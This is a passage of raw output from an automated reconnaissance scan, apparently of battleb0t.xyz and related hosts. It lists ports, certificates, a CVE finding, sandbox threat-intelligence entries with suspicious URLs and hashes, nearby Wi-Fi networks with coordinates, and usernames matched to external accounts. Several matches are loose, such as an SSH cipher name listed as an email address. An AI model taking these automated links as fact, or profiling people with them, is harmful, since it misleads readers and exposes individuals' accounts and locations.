[targetUID: 00000000-00000604]\n "httpErrorPagesScripts_1_" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- [targetUID: N/A]\n "7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6]- [targetUID: 00000000-00000604]\n "~DF8765436AF976415F.TMP" has type "data"- Location: [%TEMP%\\~DF8765436AF976415F.TMP]- [targetUID: 00000000-00000992]\n "Tar1485.tmp" has type "data"- Location: [%TEMP%\\Tar1485.tmp]- [targetUID: 00000000-00000604]\n "6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6BADA8974A10C4BD62CC921D13E43B18_711ED44619924BA6DC33E69F97E7FF63]- [targetUID: 00000000-00000992]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://www.finops.org/"\n Pattern match: "http://www.finops.org"\n Pattern match: "www.finops.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/92 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, 
u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.196.254.27": ...\n\n URL: https://nauvesneper1987.netlify.app/ (AV positives: 3/88 scanned on 09/20/2022 02:10:15)\n URL: http://keen-kitsune-bbdc6c.netlify.app/ (AV positives: 5/88 scanned on 09/20/2022 01:48:45)\n URL: http://spincats-mint.xyz/ (AV positives: 1/88 scanned on 09/20/2022 01:39:48)\n URL: http://guileless-piroshki-66ded8.netlify.app/ (AV positives: 8/89 scanned on 09/20/2022 01:00:01)\n URL: http://candid-moxie-ca3d19.netlify.app/ (AV positives: 6/89 scanned on 09/20/2022 00:18:36)\n File SHA256: 78552f5436b9bf8f079510592f7d61c991abc31f687db116c76cda7b3d1de8dd (AV positives: 3/74 scanned on 09/16/2022 23:21:30)\n File SHA256: 8a18b93b6700b5d9608bdab276c73e2ad97d2d7db16de798d4f35bf99e1feb8b (AV positives: 10/75 scanned on 09/16/2022 23:59:21)\n File SHA256: 9855d6610d262f5c5ac33a4824ce6d6aff9434181e2925d2e8502f55e0f4ccc2 (AV positives: 9/75 scanned on 09/13/2022 23:52:30)\n File SHA256: 6fbdf58ac0a20649648d8b3f171ad22b5a0f75015f17f61cd9b7097a86841671 (AV positives: 22/75 scanned on 09/10/2022 23:18:07)\n File SHA256: 10eb6a8b65dc19a76287d777aa59dd82975f4af0a30f3493a4c67e21c064d0ad (AV positives: 19/75 scanned on 09/08/2022 20:19:43)'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-33', u'name': u'Malicious artifacts seen in the context of the input URL', u'attck_id_wiki': None, u'threat_level_human': u'malicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, 
u'threat_level': 2, u'type': 7, u'description': u'Found malicious artifacts related to the input domain "http://www.finops.org" (IP: 34.196.254.27): ...\n\n URL: https://nauvesneper1987.netlify.app/ (AV positives: 3/88 scanned on 09/20/2022 02:10:15)\n URL: http://keen-kitsune-bbdc6c.netlify.app/ (AV positives: 5/88 scanned on 09/20/2022 01:48:45)\n URL: http://spinca | 35.229.48.116 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | " (Cloaked) (Net ID: 00:01:36:59:CB:CF) | 37.780462,-122.390564 |
| 2023-05-12 02:54:03 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 172.67.135.9:2082 | 172.67.135.9 |
| 2023-05-12 02:56:21 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
09:cc:cb:40:35:8f:10:16:7b:c7:37:cb:94:7e:31:1a
Signature Algorithm: ecdsa-with-SHA256
Issuer: C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3
Validity
Not Before: Mar 23 00:00:00 2023 GMT
Not After : Mar 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:c7:e0:ee:e2:73:a9:c6:66:6e:30:ed:fc:ae:52:
d4:ca:18:2f:13:3b:72:ab:38:92:54:46:c1:4d:8e:
47:44:3c:fd:42:6f:de:16:4a:26:42:38:ad:e6:91:
f4:0b:0b:51:3f:e6:50:3a:4c:ca:ea:9e:3d:ae:a2:
1a:21:17:88:b9
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:A5:CE:37:EA:EB:B0:75:0E:94:67:88:B4:45:FA:D9:24:10:87:96:1F
X509v3 Subject Key Identifier:
ED:98:C9:DB:21:9F:40:A3:B3:0F:A1:47:F2:8D:C0:DD:DA:EB:C7:D1
X509v3 Subject Alternative Name:
DNS:*.battleb0t.xyz, DNS:battleb0t.xyz, DNS:sni.cloudflaressl.com
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/CloudflareIncECCCA-3.crl
Full Name:
URI:http://crl4.digicert.com/CloudflareIncECCCA-3.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/CloudflareIncECCCA-3.crt
X509v3 Basic Constraints: critical
CA:FALSE
CT Precertificate Poison: critical
NULL
Signature Algorithm: ecdsa-with-SHA256
30:46:02:21:00:f0:9f:8d:f6:d4:d5:c9:85:3d:e1:3b:e8:89:
39:bb:cd:62:6f:8c:ee:3f:e9:ac:78:6c:9b:85:17:ee:a9:64:
05:02:21:00:e4:53:28:da:31:66:f2:dc:34:6e:1b:42:2d:d7:
79:d3:ee:4b:3d:8a:1c:37:ce:37:5d:dc:4f:bf:b9:94:32:b3
| battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet92D6 (Net ID: 00:01:36:5B:92:D4) | 34.0544, -118.244 |
| 2023-05-12 02:44:14 | IPv6 Address | No | DNS Resolver | 15 | 0 | 1 | 0 | None | 2606:50c0:8002::153 | battleb0t.xyz |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 2WIRE514 (Net ID: 00:02:2D:8C:DC:7C) | 34.0544, -118.244 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Flickr (Category: images)
https://www.flickr.com/photos/login/ | login |
| 2023-05-12 03:17:44 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/_BattleB0t_ | _BattleB0t_ |
| 2023-05-12 03:09:31 | Co-Hosted Site - Domain Name | No | DNS Resolver | 2 | 0 | 3 | 0 | None | scoop.sh | scoop.sh |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.232): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:00 | Malicious IP on Same Subnet | Yes | CINS Army List | 0 | 0 | 4 | 0 | None | cinsscore.com [207.154.224.0/20]
http://cinsscore.com/list/ci-badguys.txt | 207.154.224.0/20 |
| 2023-05-12 03:00:50 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-ye.github.io | 185.199.111.153 |
| 2023-05-12 03:13:06 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [007hyno.github.io]
https://www.openphish.com/feed.txt | 007hyno.github.io |
| 2023-05-12 02:45:26 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | Toronto, Ontario, ON, Canada, CA | 104.21.71.14 |
| 2023-05-12 03:32:11 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.6:8080 | 188.114.97.0/24 |
| 2023-05-12 03:19:22 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 185.199.109.153:80 | 185.199.109.0/24 |
| 2023-05-12 02:55:05 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.97.1:2053 | 188.114.97.1 |
| 2023-05-12 02:58:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [u'34.148.97.127', u'172.67.191.224'], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://earnest-meringue-443870.netlify.app/', u'signatures': [{u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "TarDD5A.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"34.148.97.127:443"\n "172.67.191.224:80"\n "34.236.97.106:443"\n "142.250.72.168:443"\n "35.190.72.161:443"\n "142.250.217.131:80"\n "104.18.156.225:443"\n "35.190.36.172:443"\n "142.250.189.14:80"\n "192.124.249.24:80"\n "35.190.13.203:443"\n "192.124.249.41:80"\n "142.250.188.238:443"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_bb4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_bb4_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n 
"Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_bb4_IESQMMUTEX_0_303"\n "IsoScope_bb4_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_bb4_ConnHashTable<2996>_HashTable_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_bb4_IE_EarlyTabStart_0xd98_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2996"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "UpdatingNewTabPageData"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2996"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"ml-trk.com"\n "ocsp.pki.goog"\n "crls.pki.goog"\n "crl.pki.goog"\n "ocsp.godaddy.com"\n "crl.godaddy.com"\n "aux.fqtag.com"\n "cdn.fqtag.com"\n "flx808.lporirxe.com"\n "fqtag.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabDD18.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "CabDD59.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data 61712 bytes 1 file"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
None, u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "5GYBJR85.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5GYBJR85.txt]- [targetUID: 00000000-00003196]\n "ncvp_1_.js" has type "data"- [targetUID: N/A]\n "regular_1_.png" has type "PNG image data 70 x 70 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3538626A1FCCCA43C7E18F220BDD9B02" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\3538626A1FCCCA43C7E18F220BDD9B02]- [targetUID: 00000000-00003196]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003196]\n "jquery.autoComplete_1_.js" has type "UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA]- [targetUID: 00000000-00003196]\n "B46PLW8Z.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\B46PLW8Z.txt]- [targetUID: 00000000-00003196]\n "70DAE932E3BCB3C00656A27B544BA9CA" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\70DAE932E3BCB3C00656A27B544BA9CA]- [targetUID: 00000000-00003196]\n "07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D]- [targetUID: 00000000-00003196]\n "6DB145CFEEC544B1582FED1ADA3370DD" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\6DB145CFEEC544B1582FED1ADA3370DD]- [targetUID: 00000000-00002996]\n "69C6F6EC64E114822DF688DC12CDD86C" has type "data"- Location: 
[%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\69C6F6EC64E114822DF688DC12CDD86C]- [targetUID: 00000000-00002996]\n "logo_3_.png" has type "PNG image data 647 x 80 8-bit/color RGBA interlaced"- [targetUID: N/A]\n "CabDD18.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabDD18.tmp]- [targetUID: 00000000-00003196]\n "CabDD59.tmp" has type "Microsoft Cabinet archive data 61712 bytes 1 file"- Location: [%TEMP%\\CabDD59.tmp]- [targetUID: 00000000-00003196]\n "EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D]- [targetUID: 00000000-00003196]\n "67F6625BC22310D5C99DDE12020DBD90" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\67F6625BC22310D5C99DDE12020DBD90]- [targetUID: 00000000-00003196]\n "TarDD5A.tmp" has type "data"- Location: [%TEMP%\\TarDD5A.tmp]- [targetUID: 00000000-00003196]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"crl.godaddy.com" seems to be random'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-20', u'name': u'HTTP request contains Base64 encoded artifacts', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1132/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1132.001', u'relevance': 7, u'threat_level': 0, u'type': 7, u'description': u'"i$Cj&){akj-{%"\n "P`<1"\n "_|~wmmm|w;"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://earnest-meringue-443870.netlify.app/"- [Source: Input]\n Pattern match: "https://earnest-meringue-443870.netlify.app"- [Source: Input]\n Heuristic match: "ml-trk.com"- [Source: PCAP]\n Heuristic match: "ocsp.godaddy.com"- [Source: PCAP]\n Heuristic match: "GET //MEQwQjBAMD4wPDAJBgUrDgMCGgUABBTkIInKBAzXkF0Qh0pel3lfHJ9GPAQU0sSw0pHUTBFxs2HLPaH%2B3ahq1OMCAxvnFQ%3D%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.godaddy.com"- [Source: PCAP]\n Heuristic match: "crl.godaddy.com"- [Source: PCAP]\n Heuristic match: "GET /gdroot-g2.crl HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: crl.godaddy.com"- [Source: PCAP]\n Heuristic match: "GET //MEIwQDA%2BMDwwOjAJBgUrDgMCGgUABBQdI2%2BOBkuXH93foRUj4a7lAr4rGwQUOpqFBxBnKLbv9r0FQW4gwZTaD94CAQc%3D HTTP/1.1\nConnection: Keep-Alive\nAccept: */*\nUser-Agent: Microsoft-CryptoAPI/6.1\nHost: ocsp.godaddy.com"- [Source: PCAP]\n Heuristic match: "aux.fqtag.com"- [Source: PCAP]\n Heuristic match: "cdn.fqtag.com"- [Source: PCAP]\n Heuristic match: "flx808.lporirxe.com"- [Source: PCAP]\n Heuristic match: "fqtag.com"- [Source: PCAP]\n Pattern match: "www.ukrainiangirldating.com"- [Source: PCAP]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-22', u'name': u'Uses a User Agent typical for browsers, although no browser was ever launched', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found user agent(s): Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-21', u'name': u'Malicious artifacts seen in the context of a 
contacted host', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 7, u'description': u'Found malicious artifacts related to "34.148.97.127": ...\n\n URL: http://junglefreaks.store/ (AV positives: 1/88 scanned on 08/23/2022 08:36:00)\n URL: http://imrn.dev/ (AV positives: 1/88 scanned on 08/23/2022 08:2 | 34.148.97.127 |
| 2023-05-12 02:44:48 | Raw Data from RIRs | No | CRXcavator | 0 | 0 | 1 | 0 | None | [{"platform": "Chrome", "extension_id": "mdcffelghikdiafnfodjlgllenhlnejl", "name": "GayHub", "icon": "https://lh3.googleusercontent.com/rZ8V_inU3Be2PxnPEyV9srR3G_5mJ_618v81YKqluedhhRG1boWeD5rZHFFN4VI0_7dmWXBueXjQBFnTN4kAfCmNbQ=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "ppaeilehlbalfblndppebfpgikeodlaj", "name": "Aliexpress Ebay DropShipping - Ebayhunt", "icon": "https://lh3.googleusercontent.com/NzJqQYrT2UL825AQ1yg79_gtXND1L0CSo0J9AZpMiqonPLiAlckkEKy_UTvkE8T_pr0zXKykXV--eedN26HQTPNl8g=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "agjliddikiapkkpacaacecphgdoplfop", "name": "ReplayHub YouTube Looper", "icon": "https://lh3.googleusercontent.com/8hLe0teq-FvENQnMGTH5hbKoAgfgd5YttifZdgjiDupvDj0k9qP7enO7qNry3CWBXmZtrms-qMTbQk7rL--uibGNuA=w128-h128-e365-rj-sc0x00ffffff"}, {"platform": "Chrome", "extension_id": "fcnbnbmppjiehikhcaalfjmopkpfaeji", "name": "DayHub", "icon": "https://lh3.googleusercontent.com/v78saLETMsfToP0i6U9zZo4gg6OjGyRw-VmkftOIrIhRyAsqH79lO7JoC5e6S5lrwbbqFRZxCrnAAZagk0kSEqfnJA=w128-h128-e365-rj-sc0x00ffffff"}] | ayhu.xyz |
| 2023-05-12 02:58:44 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None |  | 34.74.170.74 |
| 2023-05-12 02:45:38 | Physical Location | No | MetaDefender | 0 | 0 | 2 | 0 | None | San Francisco, United States | 185.199.108.153 |
| 2023-05-12 02:46:49 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | netlify.app | 35.229.48.116 |
| 2023-05-12 03:19:47 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | GitHub (Category: coding)<br>https://github.com/patrickpogoda | patrickpogoda |
| 2023-05-12 02:50:03 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None |  | 185.199.110.153 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.93): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:03:25 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 0000magda0000.github.io |
| 2023-05-12 02:44:13 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 1 | 2 | 0 | None | www.github.com | www.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTaFmrKmS (Net ID: 78:23:AE:39:B2:90) | 37.751, -97.822 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | PDI (Net ID: 00:06:25:FE:34:4D) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:8080 | 188.114.96.0/24 |
| 2023-05-12 03:43:57 | URL (Purely Static) | No | Page Information | 0 | 0 | 3 | 0 | None | https://kekw.battleb0t.xyz/jar | `<!DOCTYPE html> <html> <iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe> </html>` |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Room 208 (Net ID: 00:02:2D:66:D4:6B) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5ad40179b8e20f-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-14 15:23:50 | battleb0t.xyz |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Capsmanagement (Net ID: 00:01:21:1C:AD:40) | 41.8781, -87.6298 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | MCName (Minecraft) (Category: gaming)<br>https://mcname.info/en/search?q=ayshoo | ayshoo |
| 2023-05-12 03:00:31 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | aes256-gcm@openssh.com |  |
| 2023-05-12 03:01:43 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.223): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:44:19 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2600:1f18:2489:8201::c8 | pics.battleb0t.xyz |
| 2023-05-12 03:14:48 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-6329
https://nvd.nist.gov/vuln/detail/CVE-2016-6329
Score: 5.9
Description: OpenVPN, when using a 64-bit block cipher, makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTP-over-OpenVPN session using Blowfish in CBC mode, aka a "Sweet32" attack. | www.ayhu.xyz |
| 2023-05-12 02:44:22 | Physical Location | No | ipstack | 0 | 0 | 2 | 0 | None | United States | 185.199.109.153 |
| 2023-05-12 02:45:34 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 1 | 0 | None | route2.mx.cloudflare.net | battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | sflan11 (Net ID: 00:02:6F:08:21:EE) | 37.7642, -122.3993 |
| 2023-05-12 03:21:44 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | PinkBike (Category: hobby)
https://www.pinkbike.com/u/dawid.sulej/ | dawid.sulej |
| 2023-05-12 02:51:43 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4e:82:1a:86:ae:7d:8a:39:3c:25:24:c6:46:df:b3:a2:f4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Apr 24 03:43:01 2023 GMT
Not After : Jul 23 03:43:00 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
18:07:25:ED:0B:E1:FD:78:EA:13:86:BD:62:79:CF:21:9B:25:7F:4B
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
